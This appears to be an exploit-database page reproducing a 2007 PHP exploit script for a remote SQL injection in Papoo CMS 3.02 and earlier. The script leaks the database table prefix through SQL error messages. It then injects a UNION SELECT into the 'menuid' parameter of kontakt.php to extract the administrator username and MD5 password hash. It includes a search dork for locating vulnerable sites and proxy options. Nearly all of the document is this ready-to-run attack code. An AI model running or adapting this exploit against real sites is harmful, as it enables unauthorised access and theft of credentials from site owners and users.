Lucene search
K

Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit

🗓️ 15 Apr 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

Papoo 3.02 SQL Injection Exploi

Code

                                                <?
/*
Autor: Kacper
Contact: [email protected]
Homepage: http://www.rahim.webd.pl/
Irc: irc.milw0rm.com:6667 #devilteam 

Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.

//dork: "Help * Contact * Imprint * Sitemap" | "powered by papoo" | "powered by cms papoo"

Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit
script homepage/download/demo: http://www.papoo.de/
*/
if ($argc<4) {
print_r('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host path userid OPTIONS
host:       target server (ip/hostname)
path:       papoo path
userid:     User ID
Options:
 -X[prefix]:  PAPOO database columns prefix
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' 127.0.0.1 /papoo/ 10
php '.$argv[0].' 127.0.0.1 /papoo/ 10 -Xpapoo
php '.$argv[0].' 127.0.0.1 /papoo/ 10 -P1.1.1.1:80
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function wyslijpakiet($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$userid=$argv[3];
$port=80;
$proxy="";
for ($i=4; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-X")
{
  $prefix=str_replace("-X","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die("Bad path!");}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
function sprawdz($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}
function char_convert($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}
if (isset($prefix)) {
    echo "Prefix: ".$prefix."\r\n";
}
if ($prefix=="")
{
  $packet="GET ".$p."kontakt.php?menuid=-1)+ HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  wyslijpakiet($packet);
  if (strstr($html,"You have an error in your SQL syntax"))
  {
    $temp=explode("_papoo_collum3",$html);
    $temp2=explode("SELECT article FROM ",$temp[0]);
    $prefix=$temp2[count($temp2)-1];
    echo "prefix: ".$prefix."\n";
  }
  else
  {die("Unable to disclose table prefix...\n");}
}

print "Papoo <= 3.02 (kontakt menuid) Remote SQL Injection Exploit by Kacper\r\n";
$packet ="GET ".$p."kontakt.php?menuid=-1)+union+select+CONCAT(".char_convert("<!--[#").",username,CHAR(58),password,".char_convert("#]-->").")+from+".$prefix."_papoo_user+WHERE+userid=".$userid."/* HTTP/1.0\r\n";
$packet.="Referer: http://".$host.$path."kontakt.php\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$temp=explode('<!--[#',$html);
$temp2=explode('#]-->',$temp[1]);
for ($i=1; $i<=count($temp)-1; $i++)
{
 $temp2=explode(":",$temp[$i]);
 if (sprawdz($temp2[1]))
 {
  echo "admin          => ".$temp2[0]."\n";
  echo "password (md5) => ".$temp2[1]."\n";
  die;
 }
}
echo "Script is not vulnerability ;(\r\n";
?>

# milw0rm.com [2007-04-15]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2007 00:00Current
7.1High risk
Vulners AI Score7.1
21